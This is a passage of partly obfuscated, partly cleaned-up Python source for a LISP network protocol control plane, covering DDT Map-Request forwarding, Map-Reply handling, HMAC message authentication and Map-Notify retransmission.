        lisp_retransmit_ddt_map_request, [mr])
    mr.retransmit_timer.start()
    return
if 29 - 29: I1Ii111
if 95 - 95: OoOoOO00 * II111iiii + I1ii11iIi11i - I11i . I11i % i11iIiiIii
if 23 - 23: OoO0O00
if 26 - 26: I1ii11iIi11i
if 66 - 66: i11iIiiIii - i11iIiiIii / Ii1I * OOooOOo / IiII
if 67 - 67: I1IiiI . I1Ii111 - OoOoOO00
if 18 - 18: O0
if 26 - 26: i1IIi - iIii1I11I1II1
def lisp_get_referral_node(referral, source_eid, dest_eid):
    # Choose one referral-node from the entry's referral-set: consider
    # only nodes that are up, restrict to the best (numerically lowest)
    # priority, then hash the source/dest EIDs to load-split across the
    # remaining ties. Returns None when no node is usable.
    up_nodes = [n for n in referral.referral_set.values() if
        n.updown != False]
    if (up_nodes == []): return (None)

    # Keep only the lowest-priority nodes, preserving iteration order.
    best_priority = min(n.priority for n in up_nodes)
    best = [n for n in up_nodes if n.priority == best_priority]

    # Deterministic hash-based selection among equal-priority nodes.
    index = dest_eid.hash_address(source_eid) % len(best)
    return (best[index])
if 88 - 88: O0 * II111iiii
if 81 - 81: OoOoOO00 % I11i / i1IIi
if 87 - 87: II111iiii + oO0o - I1ii11iIi11i
if 42 - 42: Oo0Ooo - ooOoO0o % OoOoOO00 + OoOoOO00
if 61 - 61: I1Ii111
if 67 - 67: I1IiiI / IiII / iII111i - I1Ii111 - o0oOOo0O0Ooo
if 75 - 75: OOooOOo . ooOoO0o
def lisp_send_ddt_map_request(mr, send_to_root):
    # Forward a queued Map-Request 'mr' through the DDT hierarchy. When
    # 'send_to_root' is set, skip the longest-match lookup and query the
    # DDT root instead.
    sockets = mr.lisp_sockets
    nonce = mr.nonce
    itr = mr.itr
    mr_source = mr.mr_source
    eid_str = mr.print_eid_tuple()

    # Bound how many times one queue entry may be forwarded.
    if (mr.send_count == 8):
        lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format(
            green(eid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return

    # Choose the referral-cache lookup key: wildcard for the root, or
    # the request's own EID/group.
    if (send_to_root):
        lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        mr.tried_root = True
        lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
    else:
        lookup_eid = mr.eid
        lookup_group = mr.group

    # No referral entry at all -> negative Map-Reply, 15-minute TTL.
    referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
    if (referral == None):
        lprint("No referral cache entry found")
        lisp_send_negative_map_reply(sockets, lookup_eid, lookup_group,
            nonce, itr, mr.sport, 15, None, False)
        return

    referral_str = referral.print_eid_tuple()
    lprint("Found referral cache entry {}, referral-type: {}".format(referral_str,
        referral.print_referral_type()))

    # Pick a reachable referral-node; none up -> short negative reply.
    node = lisp_get_referral_node(referral, mr_source, mr.eid)
    if (node == None):
        lprint("No reachable referral-nodes found")
        mr.dequeue_map_request()
        lisp_send_negative_map_reply(sockets, referral.eid,
            referral.group, nonce, itr, mr.sport, 1, None, False)
        return

    lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}".format(
        node.referral_address.print_address(),
        referral.print_referral_type(), green(eid_str, False),
        lisp_hex_string(nonce)))

    # Flag the ECM as Map-Server bound for MS referral types.
    to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
        referral.referral_type == LISP_DDT_ACTION_MS_ACK)
    lisp_send_ecm(sockets, mr.packet, mr_source, mr.sport, mr.eid,
        node.referral_address, to_ms=to_ms, ddt=True)

    # Bookkeeping for retransmission and statistics.
    mr.last_request_sent_to = node.referral_address
    mr.last_sent = lisp_get_timestamp()
    mr.send_count += 1
    node.map_requests_sent += 1
    return
if 1 - 1: OoooooooOO % I11i
if 8 - 8: Ii1I / IiII - i1IIi - Ii1I
if 95 - 95: IiII % I11i % iIii1I11I1II1 . OoO0O00
if 11 - 11: i11iIiiIii - IiII . o0oOOo0O0Ooo / IiII - I1IiiI
if 66 - 66: iIii1I11I1II1 . i1IIi . i11iIiiIii % I1ii11iIi11i * OOooOOo % IiII
if 34 - 34: I1IiiI % I11i - iII111i - i11iIiiIii - iIii1I11I1II1 / i1IIi
if 7 - 7: I1IiiI + iIii1I11I1II1 . oO0o
if 17 - 17: OoO0O00 / OoO0O00 + o0oOOo0O0Ooo / OOooOOo . I1ii11iIi11i % IiII
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
    sport, mr_source):
    # Map-Resolver entry point for a Map-Request: log it, queue state so
    # the request can be retransmitted/dequeued later, then start the
    # DDT walk.
    target_eid = map_request.target_eid
    target_group = map_request.target_group
    request_nonce = map_request.nonce

    pitr_flag = "P" if map_request.pitr_bit else ""
    src_str = green(mr_source.print_address(), False)
    eid_str = green(map_request.print_eid_tuple(), False)
    lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
        format(pitr_flag, red(ecm_source.print_address(), False), src_str,
        eid_str, lisp_hex_string(request_nonce)))

    # Build and queue the DDT request-tracking entry.
    ddt_mr = lisp_ddt_map_request(lisp_sockets, packet, target_eid,
        target_group, request_nonce)
    ddt_mr.packet = packet
    ddt_mr.itr = ecm_source
    ddt_mr.mr_source = mr_source
    ddt_mr.sport = sport
    ddt_mr.from_pitr = map_request.pitr_bit
    ddt_mr.queue_map_request()

    lisp_send_ddt_map_request(ddt_mr, False)
    return
if 40 - 40: I1IiiI . I1ii11iIi11i - ooOoO0o / o0oOOo0O0Ooo
if 37 - 37: iII111i * OoOoOO00 % I1ii11iIi11i - I1Ii111
if 13 - 13: Oo0Ooo + Oo0Ooo
if 20 - 20: OoO0O00 * OoOoOO00 . OOooOOo
if 14 - 14: iII111i / i1IIi + II111iiii
if 54 - 54: Ii1I - I1IiiI + iII111i * iII111i
if 78 - 78: I1Ii111
def lisp_process_map_request ( lisp_sockets , packet , ecm_source , ecm_port ,
    mr_source , mr_port , ddt_request , ttl ) :
    # Dispatcher for a received Map-Request. Decodes the message, then
    # routes it to every role this process plays: RLOC-probe responder,
    # SMR handling, ETR, Map-Server, Map-Resolver, and DDT-node.
    if 79 - 79: IiII * IiII . OOooOOo + iIii1I11I1II1 . II111iiii
    IiIIIii1iIII1 = packet  # undecoded copy, re-used by the MS/DDT paths
    oOOooOoo0O = lisp_map_request ( )
    packet = oOOooOoo0O . decode ( packet , mr_source , mr_port )
    if ( packet == None ) :
        lprint ( "Could not decode Map-Request packet" )
        return
    if 70 - 70: i1IIi . I11i * o0oOOo0O0Ooo . iII111i
    if 75 - 75: oO0o * OoO0O00 * I11i + oO0o + O0 . I1Ii111
    oOOooOoo0O . print_map_request ( )
    if 8 - 8: I1ii11iIi11i / i1IIi - I1ii11iIi11i + Ii1I + OoO0O00 - I11i
    if 79 - 79: OoooooooOO - I1Ii111 * I1IiiI . I1Ii111 - iIii1I11I1II1
    if 27 - 27: OoOoOO00 % OoOoOO00 % II111iiii
    if 45 - 45: iIii1I11I1II1 . o0oOOo0O0Ooo % I1IiiI
    # RLOC-probes are answered directly; no further processing needed.
    if ( oOOooOoo0O . rloc_probe ) :
        lisp_process_rloc_probe_request ( lisp_sockets , oOOooOoo0O ,
            mr_source , mr_port , ttl )
        return
    if 10 - 10: I1IiiI / i1IIi * o0oOOo0O0Ooo + Oo0Ooo - OoOoOO00 % iII111i
    if 88 - 88: Ii1I % Ii1I
    if 29 - 29: OOooOOo % I1ii11iIi11i
    if 57 - 57: I1ii11iIi11i - OoOoOO00 + IiII
    if 58 - 58: OOooOOo % I1IiiI / oO0o . ooOoO0o . OoO0O00 / IiII
    # Solicited-Map-Request processing.
    if ( oOOooOoo0O . smr_bit ) :
        lisp_process_smr ( oOOooOoo0O )
    if 72 - 72: ooOoO0o + ooOoO0o + o0oOOo0O0Ooo - o0oOOo0O0Ooo % Ii1I
    if 52 - 52: I11i % i1IIi . I1ii11iIi11i
    if 62 - 62: ooOoO0o - I1ii11iIi11i
    if 71 - 71: I11i
    if 34 - 34: oO0o / O0 * oO0o
    if ( oOOooOoo0O . smr_invoked_bit ) :
        lisp_process_smr_invoked_request ( oOOooOoo0O )
    if 47 - 47: iIii1I11I1II1 - o0oOOo0O0Ooo % Ii1I
    if 38 - 38: ooOoO0o / IiII * I1ii11iIi11i % I1ii11iIi11i % oO0o
    if 82 - 82: I1ii11iIi11i . i11iIiiIii - I11i . iII111i / OOooOOo
    if 60 - 60: I1IiiI / I1IiiI / II111iiii
    if 59 - 59: OOooOOo . oO0o + ooOoO0o % o0oOOo0O0Ooo . i11iIiiIii
    # ETR role.
    if ( lisp_i_am_etr ) :
        lisp_etr_process_map_request ( lisp_sockets , oOOooOoo0O , mr_source ,
            mr_port , ttl )
    if 27 - 27: OoOoOO00 - OoooooooOO / IiII / II111iiii * OOooOOo * ooOoO0o
    if 43 - 43: II111iiii . IiII - I1IiiI * I1ii11iIi11i + OoooooooOO
    if 34 - 34: I1Ii111 / i1IIi
    if 95 - 95: OoOoOO00 * OOooOOo
    if 68 - 68: I1Ii111 / iIii1I11I1II1 % Ii1I
    # Map-Server role: process the request and, when it arrived via
    # DDT, also send a Map-Referral back to the requesting node.
    if ( lisp_i_am_ms ) :
        packet = IiIIIii1iIII1
        I111o0oooO00o0 , oOoooOOO0o0 , OoOo0OO = lisp_ms_process_map_request ( lisp_sockets ,
            IiIIIii1iIII1 , oOOooOoo0O , mr_source , mr_port , ecm_source )
        if ( ddt_request ) :
            lisp_ms_send_map_referral ( lisp_sockets , oOOooOoo0O , ecm_source ,
                ecm_port , OoOo0OO , I111o0oooO00o0 , oOoooOOO0o0 )
        if 26 - 26: oO0o + OoooooooOO % o0oOOo0O0Ooo
        return
    if 96 - 96: ooOoO0o * OoOoOO00 - II111iiii
    if 40 - 40: oO0o * OOooOOo + Ii1I + I11i * Ii1I + OoooooooOO
    if 77 - 77: OOooOOo + ooOoO0o / O0
    if 16 - 16: ooOoO0o + Oo0Ooo * Oo0Ooo . I11i - IiII
    if 49 - 49: ooOoO0o . Ii1I
    # Map-Resolver role (not taken for DDT-originated requests).
    if ( lisp_i_am_mr and not ddt_request ) :
        lisp_mr_process_map_request ( lisp_sockets , IiIIIii1iIII1 , oOOooOoo0O ,
            ecm_source , mr_port , mr_source )
    if 75 - 75: OOooOOo / II111iiii - Oo0Ooo + I1Ii111
    if 42 - 42: OoooooooOO * II111iiii + Ii1I % OoO0O00 / I1Ii111
    if 11 - 11: ooOoO0o / Oo0Ooo + i1IIi / IiII
    if 4 - 4: iII111i - Oo0Ooo
    if 100 - 100: OOooOOo . i1IIi
    # DDT-node role.
    if ( lisp_i_am_ddt or ddt_request ) :
        packet = IiIIIii1iIII1
        lisp_ddt_process_map_request ( lisp_sockets , oOOooOoo0O , ecm_source ,
            ecm_port )
        if 15 - 15: O0 % Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o * iII111i % O0
    return
if 31 - 31: i1IIi . Ii1I - OoooooooOO * I11i * ooOoO0o % oO0o
if 61 - 61: I1Ii111 . Ii1I * I1ii11iIi11i
if 59 - 59: OoOoOO00 + Oo0Ooo . I1ii11iIi11i - Ii1I
if 48 - 48: I1Ii111 % Ii1I + I1IiiI * OoooooooOO % OoOoOO00 % i11iIiiIii
if 13 - 13: iII111i % i1IIi
if 13 - 13: iII111i / OoooooooOO + Ii1I / iII111i
if 29 - 29: OOooOOo + ooOoO0o % o0oOOo0O0Ooo
if 18 - 18: I11i + OoO0O00 + OoO0O00 . ooOoO0o
def lisp_store_mr_stats(source, nonce):
    # Record statistics for a negative Map-Reply received from the
    # Map-Resolver at address 'source'.
    resolver = lisp_get_map_resolver(source, None)
    if (resolver == None): return

    resolver.neg_map_replies_received += 1
    resolver.last_reply = lisp_get_timestamp()

    # Restart RTT accumulation every 100 replies.
    replies = resolver.neg_map_replies_received
    if (replies % 100 == 0): resolver.total_rtt = 0

    # A matching nonce means this reply answers our last request, so the
    # elapsed time since it was sent contributes to the RTT total.
    if (nonce == resolver.last_nonce):
        resolver.total_rtt += (time.time() - resolver.last_used)
        resolver.last_nonce = 0

    # Periodically clear a stale nonce that never got matched.
    if (replies % 10 == 0): resolver.last_nonce = 0
    return
if 46 - 46: i11iIiiIii + I11i - iIii1I11I1II1 / OoO0O00 - ooOoO0o / i1IIi
if 44 - 44: o0oOOo0O0Ooo + Oo0Ooo
if 46 - 46: OOooOOo % I1IiiI
if 66 - 66: iIii1I11I1II1 . o0oOOo0O0Ooo - ooOoO0o
if 27 - 27: Oo0Ooo - i1IIi * OoooooooOO - OoOoOO00 + OoOoOO00
if 24 - 24: i1IIi . OoOoOO00 / I1Ii111 + O0
if 86 - 86: Ii1I * OoOoOO00 % I1ii11iIi11i + OOooOOo
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
    # Parse a received Map-Reply and add/refresh a map-cache entry for
    # each EID-record it carries. Also hands RLOC-probe replies to the
    # probe machinery and triggers probing of newly learned RLOC-sets.
    global lisp_map_cache

    map_reply = lisp_map_reply()
    packet = map_reply.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Reply packet")
        return

    map_reply.print_map_reply()

    # Remember the most recently rekeyed RLOC so its keys can be pushed
    # to an external data-plane at the end.
    rekeyed_rloc = None
    for rec_num in range(map_reply.record_count):
        eid_record = lisp_eid_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Reply packet")
            return

        eid_record.print_record(" ", False)

        # A zero-RLOC record is a negative reply; track resolver stats.
        if (eid_record.rloc_count == 0):
            lisp_store_mr_stats(source, map_reply.nonce)

        multicast = (eid_record.group.is_null() == False)

        # In decent-push mode, skip drop-action (S,G) records whose
        # source EID is local to us.
        if (lisp_decent_push_configured):
            drop_action = eid_record.action
            if (multicast and drop_action == LISP_DROP_ACTION):
                if (eid_record.eid.is_local()): continue

        if (eid_record.eid.is_null()): continue

        # Find any existing map-cache entry for this EID (and group).
        if (multicast):
            mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
        else:
            mc = lisp_map_cache.lookup_cache(eid_record.eid, True)

        new_entry = (mc == None)

        # Gleaned entries are owned by the data-plane; a Map-Reply must
        # neither overwrite one nor create an entry where gleaning rules.
        if (mc == None):
            gleaned, unused_a, unused_b = lisp_allow_gleaning(eid_record.eid,
                eid_record.group, None)
            if (gleaned): continue
        else:
            if (mc.gleaned): continue

        # Decode every RLOC-record, merging with already-cached RLOC
        # state when the address is known.
        rloc_set = []
        for rloc_num in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            rloc_record.keys = map_reply.keys
            packet = rloc_record.decode(packet, map_reply.nonce)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Reply packet")
                return

            rloc_record.print_record(" ")

            cached_rloc = None
            if (mc): cached_rloc = mc.get_rloc(rloc_record.rloc)
            if (cached_rloc):
                rloc = cached_rloc
            else:
                rloc = lisp_rloc()

            # Store record contents (and any security keys) in the RLOC.
            key_change = rloc.store_rloc_from_record(rloc_record,
                map_reply.nonce, source)
            rloc.echo_nonce_capable = map_reply.echo_nonce_capable

            if (rloc.echo_nonce_capable):
                addr_str = rloc.rloc.print_address_no_iid()
                if (lisp_get_echo_nonce(None, addr_str) == None):
                    lisp_echo_nonce(addr_str)

            # Process a probe reply only when the probed RLOC's address
            # family matches the reply's source.
            if (map_reply.rloc_probe and rloc_record.probe_bit):
                if (rloc.rloc.afi == source.afi):
                    lisp_process_rloc_probe_reply(rloc.rloc, source,
                        key_change, map_reply.nonce, map_reply.hop_count,
                        ttl)

            rloc_set.append(rloc)

            if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
                rekeyed_rloc = rloc

        # NAT-traversal: prefer private RLOCs (held unreachable until
        # probed) and keep RTR/non-RTR RLOCs according to our role.
        if (map_reply.rloc_probe == False and lisp_nat_traversal):
            nat_set = []
            log_addrs = []
            for rloc in rloc_set:
                if (rloc.rloc.is_private_address()):
                    rloc.priority = 1
                    rloc.state = LISP_RLOC_UNREACH_STATE
                    nat_set.append(rloc)
                    log_addrs.append(rloc.rloc.print_address_no_iid())
                    continue

                if (rloc.priority == 254 and lisp_i_am_rtr == False):
                    nat_set.append(rloc)
                    log_addrs.append(rloc.rloc.print_address_no_iid())

                if (rloc.priority != 254 and lisp_i_am_rtr):
                    nat_set.append(rloc)
                    log_addrs.append(rloc.rloc.print_address_no_iid())

            if (log_addrs != []):
                rloc_set = nat_set
                lprint("NAT-traversal optimized RLOC-set: {}".format(log_addrs))

        # Drop JSON-only (no-address) RLOC-records from the cached copy.
        addr_only = []
        for rloc in rloc_set:
            if (rloc.json != None): continue
            addr_only.append(rloc)

        if (addr_only != []):
            pruned = len(rloc_set) - len(addr_only)
            lprint("Pruning {} no-address RLOC-records for map-cache".format(pruned))
            rloc_set = addr_only

        # An RLOC-probe reply must not replace the stored RLOC-set.
        if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set

        # When the set changed, the old RLOCs leave the probe list.
        rloc_set_change = new_entry
        if (mc and rloc_set != mc.rloc_set):
            mc.delete_rlocs_from_rloc_probe_list()
            rloc_set_change = True

        # Create a new entry, or refresh the existing one in place.
        old_uptime = mc.uptime if (mc) else None
        if (mc == None):
            mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
            mc.mapping_source = source
            mc.map_cache_ttl = eid_record.store_ttl()
            mc.action = eid_record.action
            mc.add_cache(rloc_set_change)

        add_or_replace = "Add"
        if (old_uptime):
            mc.uptime = old_uptime
            mc.refresh_time = lisp_get_timestamp()
            add_or_replace = "Replace"

        lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
            green(mc.print_eid_tuple(), False), len(rloc_set)))

        # Push fresh keys to an attached external data-plane.
        if (lisp_ipc_dp_socket and rekeyed_rloc != None):
            lisp_write_ipc_keys(rekeyed_rloc)

        # Immediately RLOC-probe the best RLOCs of a brand-new entry.
        if (new_entry):
            probe_str = bold("RLOC-probe", False)
            for rloc in mc.best_rloc_set:
                addr_str = red(rloc.rloc.print_address_no_iid(), False)
                lprint("Trigger {} to {}".format(probe_str, addr_str))
                lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group,
                    rloc)
    return
if 86 - 86: I1IiiI . Oo0Ooo / o0oOOo0O0Ooo - i1IIi . I11i / OOooOOo
if 78 - 78: I1ii11iIi11i
if 18 - 18: ooOoO0o / I1Ii111 . o0oOOo0O0Ooo % OoOoOO00
if 60 - 60: I1IiiI . Oo0Ooo + ooOoO0o + OoO0O00
if 30 - 30: I1Ii111 * i1IIi
if 4 - 4: OoO0O00 + O0 * OOooOOo * I1Ii111 / O0
if 58 - 58: OOooOOo % ooOoO0o * I1IiiI - I1ii11iIi11i / I11i + iII111i
if 26 - 26: OoOoOO00
def lisp_compute_auth(packet, map_register, password):
    """
    Compute the authentication hash for a Map-Register message and
    encode it into the packet. Returns the packet unchanged when no
    authentication algorithm is configured on the registration.
    """
    if (map_register.alg_id == LISP_NONE_ALG_ID):
        return (packet)

    #
    # Hash over the packet with a zeroed auth field, store the digest on
    # the registration, then write it back into the packet.
    #
    zeroed_packet = map_register.zero_auth(packet)
    digest = lisp_hash_me(zeroed_packet, map_register.alg_id, password, False)
    map_register.auth_data = digest
    return (map_register.encode_auth(zeroed_packet))
if 32 - 32: I1Ii111 / I1ii11iIi11i - Ii1I % o0oOOo0O0Ooo * I1Ii111 % II111iiii
if 33 - 33: ooOoO0o % I11i
if 72 - 72: OoO0O00 % OoooooooOO / II111iiii * oO0o * I1Ii111
if 98 - 98: OOooOOo * Ii1I + I1ii11iIi11i / iIii1I11I1II1 / OoOoOO00 + I1IiiI
if 74 - 74: ooOoO0o . IiII . O0 * I1IiiI * oO0o
if 6 - 6: O0 . Ii1I / Oo0Ooo * o0oOOo0O0Ooo
if 1 - 1: i11iIiiIii
def lisp_hash_me(packet, alg_id, password, do_hex):
    """
    Compute an HMAC over 'packet' keyed with 'password', using the hash
    function selected by 'alg_id'. Returns a hex string when 'do_hex' is
    set, otherwise the raw digest. Returns True for LISP_NONE_ALG_ID
    (no authentication configured) and None for an unrecognized alg_id.
    """
    if (alg_id == LISP_NONE_ALG_ID): return (True)

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        hash_function = hashlib.sha1
    elif (alg_id == LISP_SHA_256_128_ALG_ID):
        hash_function = hashlib.sha256
    else:

        #
        # Bug fix: an unknown alg_id previously left the hash-function
        # local unbound and raised NameError below. Fail soft instead so
        # callers treat the packet as unauthenticated/invalid.
        #
        return (None)

    if (do_hex):
        hashval = hmac.new(password, packet, hash_function).hexdigest()
    else:
        hashval = hmac.new(password, packet, hash_function).digest()
    return (hashval)
if 3 - 3: O0 * O0 + II111iiii + OoOoOO00 * I11i % Oo0Ooo
if 19 - 19: oO0o % IiII % OoooooooOO % I1ii11iIi11i / OoO0O00
if 6 - 6: O0 * I1Ii111 - II111iiii
if 60 - 60: oO0o % oO0o
if 76 - 76: I1Ii111 / o0oOOo0O0Ooo
if 19 - 19: O0 . i1IIi % iIii1I11I1II1 + OOooOOo * OoOoOO00 / I11i
if 82 - 82: I1ii11iIi11i
if 75 - 75: I11i - II111iiii
def lisp_verify_auth(packet, alg_id, auth_data, password):
    """
    Recompute the authentication hash over 'packet' and compare it with
    the value 'auth_data' carried in the message. Returns True on a
    match, or when no authentication algorithm is in use.
    """
    if (alg_id == LISP_NONE_ALG_ID): return (True)

    computed = lisp_hash_me(packet, alg_id, password, True)
    matched = (computed == auth_data)

    #
    # Log a mismatch so a bad shared secret is easy to diagnose.
    #
    if (matched == False):
        lprint("Hashed value: {} does not match packet value: {}".format(
            computed, auth_data))
    return (matched)
if 43 - 43: iIii1I11I1II1 / iII111i - Ii1I + I11i % iII111i - OoO0O00
if 5 - 5: OoO0O00 / ooOoO0o
if 92 - 92: Oo0Ooo / iII111i + O0 * ooOoO0o * OOooOOo % Oo0Ooo
if 97 - 97: oO0o / Ii1I
if 70 - 70: iII111i / Oo0Ooo . OoOoOO00 - II111iiii * II111iiii % I1IiiI
if 34 - 34: I1Ii111 + OOooOOo * iII111i / ooOoO0o % i11iIiiIii
if 91 - 91: IiII * Ii1I * OOooOOo
def lisp_retransmit_map_notify(map_notify):
    """
    Timer callback that retransmits a queued Map-Notify to an ETR until
    it is acknowledged or LISP_MAX_MAP_NOTIFY_RETRIES is reached.
    """
    etr = map_notify.etr
    port = map_notify.etr_port

    #
    # Retry limit reached: cancel the timer and dequeue the pending
    # Map-Notify so it is not retransmitted again.
    #
    if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}".format(map_notify.nonce_key,
            red(etr.print_address(), False)))

        key = map_notify.nonce_key
        # Idiom fix: dict.has_key() is Python-2-only; "in" works on both.
        if (key in lisp_map_notify_queue):
            map_notify.retransmit_timer.cancel()
            lprint("Dequeue Map-Notify from retransmit queue, key is: {}".format(key))
            try:
                lisp_map_notify_queue.pop(key)
            except:
                lprint("Key not found in Map-Notify queue")
        return

    sockets = map_notify.lisp_sockets
    map_notify.retry_count += 1

    lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format(bold("Map-Notify", False), map_notify.nonce_key,
        red(etr.print_address(), False), map_notify.retry_count))

    lisp_send_map_notify(sockets, map_notify.packet, etr, port)
    if (map_notify.site): map_notify.site.map_notifies_sent += 1

    #
    # Rearm the timer for the next retransmission attempt.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
if 36 - 36: OoooooooOO / oO0o + IiII . I1IiiI - o0oOOo0O0Ooo % OOooOOo
if 15 - 15: Ii1I % IiII + IiII % iII111i - O0 * OoooooooOO
if 53 - 53: OoOoOO00 . Ii1I / Oo0Ooo
if 62 - 62: i11iIiiIii
if 38 - 38: I1ii11iIi11i % ooOoO0o * OoooooooOO + iIii1I11I1II1 % i1IIi / OOooOOo
if 6 - 6: i11iIiiIii
if 8 - 8: iIii1I11I1II1 + I1ii11iIi11i . i1IIi % OoOoOO00 % OoooooooOO * Oo0Ooo
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
    eid_record):
    """
    Send a Map-Notify carrying the merged RLOC-set in 'eid_record' to
    every registered RLOC of 'parent'. Each copy is authenticated with
    the site key and queued for retransmission until acknowledged.
    """

    #
    # Encode the EID-record followed by one RLOC-record per merged RLOC.
    #
    eid_record.rloc_count = len(parent.registered_rlocs)
    records = eid_record.encode()
    eid_record.print_record("Merged Map-Notify ", False)

    for rloc_entry in parent.registered_rlocs:
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(rloc_entry)
        records += rloc_record.encode()
        rloc_record.print_record("  ")
        del(rloc_record)

    #
    # Build and unicast one Map-Notify per registered RLOC.
    #
    for rloc_entry in parent.registered_rlocs:
        etr = rloc_entry.rloc
        map_notify = lisp_map_notify(lisp_sockets)
        map_notify.record_count = 1
        key_id = map_register.key_id
        map_notify.key_id = key_id
        map_notify.alg_id = map_register.alg_id
        map_notify.auth_len = map_register.auth_len
        map_notify.nonce = map_register.nonce
        map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
        map_notify.etr.copy_address(etr)
        map_notify.etr_port = map_register.sport
        map_notify.site = parent.site
        packet = map_notify.encode(records, parent.site.auth_key[key_id])
        map_notify.print_notify()

        #
        # Replace any Map-Notify already pending under the same key.
        # Idiom fix: dict.has_key() is Python-2-only; "in" works on both.
        #
        key = map_notify.nonce_key
        if (key in lisp_map_notify_queue):
            old_notify = lisp_map_notify_queue[key]
            old_notify.retransmit_timer.cancel()
            del(old_notify)
        lisp_map_notify_queue[key] = map_notify

        lprint("Send merged Map-Notify to ETR {}".format(red(etr.print_address(), False)))

        lisp_send(lisp_sockets, etr, LISP_CTRL_PORT, packet)

        parent.site.map_notifies_sent += 1

        #
        # Arm the retransmit timer in case no Map-Notify-Ack arrives.
        #
        map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
            lisp_retransmit_map_notify, [map_notify])
        map_notify.retransmit_timer.start()
    return
if 43 - 43: II111iiii * IiII % iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 81 - 81: oO0o % I1ii11iIi11i % ooOoO0o * O0 - OOooOOo
if 17 - 17: O0 % O0 / I1ii11iIi11i . Oo0Ooo . iII111i
if 4 - 4: OoO0O00
if 65 - 65: Oo0Ooo % O0 / I1Ii111 * IiII - oO0o
if 32 - 32: Ii1I * OoO0O00 + ooOoO0o
if 41 - 41: IiII + I11i * ooOoO0o + Oo0Ooo . ooOoO0o
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
    source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
    """
    Build a Map-Notify for 'eid_records' and send it to 'source'. When
    'map_register_ack' is True this is a one-shot acknowledgment of a
    Map-Register; otherwise the message is queued and retransmitted
    until a Map-Notify-Ack is received.
    """
    key = lisp_hex_string(nonce) + source.print_address()

    #
    # Supersede stale queued notifies for these EIDs, then suppress a
    # duplicate if one is already pending under this nonce/xTR key.
    # Idiom fix: dict.has_key() is Python-2-only; "in" works on both.
    #
    lisp_remove_eid_from_map_notify_queue(eid_list)
    if (key in lisp_map_notify_queue):
        map_notify = lisp_map_notify_queue[key]
        addr_str = red(source.print_address_no_iid(), False)
        lprint("Map-Notify with nonce 0x{} pending for xTR {}".format(lisp_hex_string(map_notify.nonce), addr_str))
        return

    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = record_count
    # Removed the original no-op self-assignment "key_id = key_id".
    map_notify.key_id = key_id
    map_notify.alg_id = alg_id
    map_notify.auth_len = auth_len
    map_notify.nonce = nonce
    map_notify.nonce_key = lisp_hex_string(nonce)
    map_notify.etr.copy_address(source)
    map_notify.etr_port = port
    map_notify.site = site
    map_notify.eid_list = eid_list

    #
    # Only queue for retransmission when this is not a simple ack.
    #
    if (map_register_ack == False):
        key = map_notify.nonce_key
        lisp_map_notify_queue[key] = map_notify

    if (map_register_ack):
        lprint("Send Map-Notify to ack Map-Register")
    else:
        lprint("Send Map-Notify for RLOC-set change")

    #
    # Authenticate with the site key and encode the message.
    #
    packet = map_notify.encode(eid_records, site.auth_key[key_id])
    map_notify.print_notify()

    if (map_register_ack == False):
        eid_record = lisp_eid_record()
        eid_record.decode(eid_records)
        eid_record.print_record("  ", False)

    lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
    site.map_notifies_sent += 1

    if (map_register_ack): return

    #
    # Arm the retransmit timer for the unacked RLOC-set-change notify.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
if 30 - 30: OoOoOO00 - OOooOOo . Oo0Ooo
if 11 - 11: IiII - I1Ii111 - OoO0O00 * o0oOOo0O0Ooo
if 99 - 99: O0 - OoO0O00
if 95 - 95: Ii1I . IiII * o0oOOo0O0Ooo
if 91 - 91: I1Ii111
if 49 - 49: I11i
if 17 - 17: Oo0Ooo % o0oOOo0O0Ooo
if 3 - 3: OoO0O00 . oO0o . oO0o . Ii1I
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
    """
    Turn 'map_notify' into a Map-Notify-Ack, authenticate it with the
    map-server password, and send it back to the map-server 'ms'.
    """
    map_notify.map_notify_ack = True

    # Authenticate and encode the acknowledgment.
    packet = map_notify.encode(eid_records, ms.password)
    map_notify.print_notify()

    dest = ms.map_server
    lprint("Send Map-Notify-Ack to {}".format(
        red(dest.print_address(), False)))
    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
